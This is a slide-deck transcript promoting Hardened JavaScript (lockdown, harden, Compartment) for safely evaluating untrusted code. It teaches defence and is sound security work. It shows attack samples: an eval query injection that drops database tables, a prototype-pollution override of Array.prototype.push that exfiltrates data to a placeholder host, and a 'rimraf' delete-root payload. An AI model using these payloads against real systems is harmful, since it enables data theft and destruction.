  • 7. ■ Sandbox ■ Unforgeable references ■ Closures ■ Run-to-completion event-loop ■ Strict mode ■ Hardenable by freezing 7 Why JavaScript
  • 8. Queries are Hobbled Programs Consider the case of a data service provider that accepts arbitrary programs instead of a weakened query language. 8 const search = query => { const matches = []; for (const item of database.items()) { if (eval(query)) { matches.push(item); }; } return matches; }; // With great interaction… search('item.price > 50 && item.size == 8'); // …comes great vulnerability. search('database.dropAllTables(), false');
  • 9. Eval is not exactly Evil The Levenshtein Distance between Eval and Evil is not zero. Eval is not Evil, QED. E V I L E 0 1 2 3 V 1 0 1 2 A 2 1 1 2 L 3 2 2 1
  • 10. eval('var undefined = null'); console.log(undefined); // null 10 Direct Eval
  • 11. 11 const indirectEval = eval; indirectEval('Math = 2 + 2'); // or: (0, eval)('Array = Object'); console.log(globalThis.Array); // Object Indirect Eval
  • 12. new Function( 'value', 'globalThis.NaN = value' // 👈 siren song here )(42); console.log(NaN); // 42 12 Function Constructor
  • 13. How Eval can be used for Evil 13 Let me count the ways. ■ To replace constructors with imposters, ■ To subvert methods on shared prototypes, ■ To distribute furtive missives on properties of unsuspecting objects, ■ To listen to activity through the walls with high resolution timers, ■ To hog local resources like memory or compute time, ■ To use powerful API’s to steal your private keys and scribble on your disk, ■ To run your kitchen sink garbage disposal at inopportune times, ■ To teach your pets to wage a guerrilla war for
  • 14. Taming Eval ■ 🔒 Lockdown: Freeze every object the language provides, the shared primordials. ■ 🧊 Harden: Give programs a way to deep freeze the objects they share with other parties. ■ 📦 Compartment: Provide a way to make spaces that only have the shared primordials and other explicitly shared objects. Give programs a firm foundation to stand on to defend their own integrity and confidentiality. 14
  • 15. 15 🔒 Lockdown lockdown(); Object.isFrozen(Array); // true Object.isFrozen(Array.prototype); // yes Object.isFrozen(Object); // indeed Object.isFrozen(Object.prototype); // verily
  • 16. 16 🧊 Harden lockdown(); const me = { ma: { ma: {}, pa: {} }, pa: { ma: {}, pa: {} }, }; harden(me); Object.isFrozen(me); // true Object.isFrozen(me.ma); // yes Object.isFrozen(me.ma.ma); // indeed Object.isFrozen(me.ma.pa); // verily Object.isFrozen(me.pa); // quite Object.isFrozen(me.pa.ma); // affirmative Object.isFrozen(me.pa.pa); // indubitably
  • 17. 17 📦 Compartment lockdown(); const compartment = new Compartment({ console }); harden(compartment.globalThis); compartment.evaluate('console.log("Hello, World!");'); compartment.evaluate(`eval("console.log('Hi');")`); compartment.evaluate('[]') instanceof Array; // totally compartment.evaluate('{}') instanceof Object; // exactly compartment.evaluate('globalThis') !== globalThis; // unique! compartment.evaluate('Date.now()'); // NaN compartment.evaluate('new Date()'); // Invalid Date compartment.evaluate('Math.random'); // undefined
  • 18. Within a Compartment 18 globalThis.NaN = 42; Math = 2 + 2; globalThis.undefined = null; const push = Array.prototype.push; Array.prototype.push = (...args) => { fetch(`https://exfiltrate.example.com?${args}`); return push.apply(this, args); }; Attacker cannot pollute prototypes.
  • 19. 19 lockdown(); const compartment = new Compartment(); harden(compartment.globalThis); const SafeFunction = compartment.globalThis.Function; const search = harden(query => { const match = new SafeFunction('item', query); const matches = []; for (const item of database.items()) { if (match(harden(item))) { matches.push(item); }; } return harden(matches); }); Safe Queries & Hardened JavaScript
  • 20. Safe Queries & Hardened JavaScript 20 // With great interaction… search('item.price > 50 && item.size == 8'); // ReferenceError: database search('database.dropAllTables(), false'); // Cannot assign search('Array.prototype.push = mitm'); // ReferenceError: require search('require("rimraf")("/")');
  • 21. Identity Discontinuity 21 const matches = search( 'item.price > 50 && item.size == 8' ); matches instanceof Array // no!?
  • 22. 22 LavaMoat and mitigating supply chain attacks https://github.com/LavaMoat/LavaMoat
  • 26. 26 Hardened JavaScript Hardened JavaScript in the Agoric Architecture
  • 29. Conclusion 29 Hardened JavaScript https://github.com/endojs/endo lockdown(); const compartment = new Compartment(); const sing = compartment.evaluate(sirenSong); sing({ enjoyMusic() { /* … */ }, // drownYourself() { /* … */ }, });
  • 30. 30 Hardened JavaScript https://github.com/endojs/endo $ npm install ses 🧙♂️ Kris Kowal 🐦 @kriskowal ✉️ kris@agoric.com
  • 31. 31
  • 32. 32